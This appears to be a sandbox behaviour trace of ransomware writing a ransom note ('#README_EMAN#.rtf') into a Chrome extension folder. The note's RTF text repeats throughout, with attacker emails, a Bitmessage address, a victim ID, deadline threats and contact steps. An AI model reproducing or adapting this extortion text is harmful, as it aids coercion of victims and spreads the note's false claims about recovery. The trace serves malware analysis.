w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.754] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.755] CloseHandle (hObject=0x2cc) returned 1 [0283.755] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\#readme_eman#.rtf")) returned 0xffffffff [0283.755] GetLastError () returned 0x2 [0283.755] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.757] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.757] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in 